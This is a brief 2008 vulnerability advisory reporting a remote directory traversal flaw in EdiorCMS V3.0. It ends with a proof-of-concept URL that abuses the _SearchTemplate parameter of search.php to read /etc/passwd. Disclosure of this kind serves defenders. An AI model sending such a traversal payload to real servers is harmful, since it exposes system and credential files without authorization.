Directory traversal in EdiorCMS V3.0

Application:  EdiorCMS V3.0

Vendor:	      http://www.edior.com

Versions:     3.0

Platforms:    ALL

Bug:          Directory traversal

Exploitation: remote

Date:         13 Mar 2008

Author:       Shennan Wang

e-mail: wsn1983 (at) gmail (dot) com [email concealed]

POC:          http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTe
mplate=../../../../../../etc/passwd